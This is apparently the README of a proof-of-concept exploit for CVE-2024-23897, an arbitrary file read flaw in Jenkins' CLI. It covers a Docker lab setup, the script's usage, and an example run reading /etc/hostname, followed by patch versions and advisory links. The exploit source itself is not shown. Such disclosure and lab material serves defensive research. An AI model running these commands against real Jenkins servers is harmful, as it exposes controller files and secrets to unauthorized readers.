## https://sploitus.com/exploit?id=5D31F81D-FA5D-54A4-AB47-1E44CDFB0608
# Jenkins CVE-2024-23897 PoC
A proof-of-concept (PoC) for CVE-2024-23897, an arbitrary file read vulnerability in Jenkins' built-in command line interface (CLI). It allows unauthenticated attackers with Overall/Read permission to read arbitrary files on the Jenkins controller file system.
**Affected Versions**
- Jenkins versions <= 2.441
- Jenkins LTS versions <= 2.426.2
## Set up a vulnerable instance
Spin up a local vulnerable instance using docker compose:
```bash
cd docker
docker compose up -d
```
The instance will be available at `http://localhost:1234`
## Exploitation
```bash
โฏ python CVE-2024-23897.py --help
usage: CVE-2024-23897.py [-h] [--url URL] [--file FILE] [--method {1,2,3}]
Jenkins CVE-2024-23897 file-read PoC
options:
-h, --help show this help message and exit
--url URL URL for Jenkins instance (default: http://localhost:1234)
--file FILE File to read (default: /etc/hostname)
--method {1,2,3} The method to use [connect-node(1), who-am-i(2), or help(3)] (default: 1)
```
**Example**
```bash
โฏ python CVE-2024-23897.py --url 'http://127.0.0.1:1234/' --file '/etc/hostname'
[i] Vulnerable to CVE-2024-23897 (Jenkins v2.441 <= 2.441)
[*] Target URL http://127.0.0.1:1234/cli?remoting=false
[*] Attempting to read /etc/hostname
[i] Download request done
[+] Found data, printing...
ERROR: No such agent "jenkins_vuln_instance" exists.
[i] Upload request done
[i] All threads completed
```
The script may have issues reading larger files due to concurrency and connection timeouts. For more technical details and a walkthrough of the vulnerability take at a look at my [blog post on the topic](https://abraxas.pages.dev/blog/cve-2024-23897/).
## Fix
- Upgrade to Jenkins 2.442 or LTS 2.426.3
- Apply temporary workarounds as described in the [Jenkins security advisory](https://www.jenkins.io/security/advisory/2024-01-24/).
## Related Links
- [Sonar Source | Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Jenkins Security Advisory - 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/#binary-files-note)
- [Qualys ThreatPROTECT | Jenkins Core Remote Code Execution Vulnerability (CVE-2024-23897)](https://threatprotect.qualys.com/2024/01/29/jenkins-core-remote-code-execution-vulnerability-cve-2024-23897/)
- [CVE-2024-23897: Assessing the Impact of the Jenkins Arbitrary File Leak Vulnerability โ Horizon3.ai](https://www.horizon3.ai/cve-2024-23897-assessing-the-impact-of-the-jenkins-arbitrary-file-leak-vulnerability/)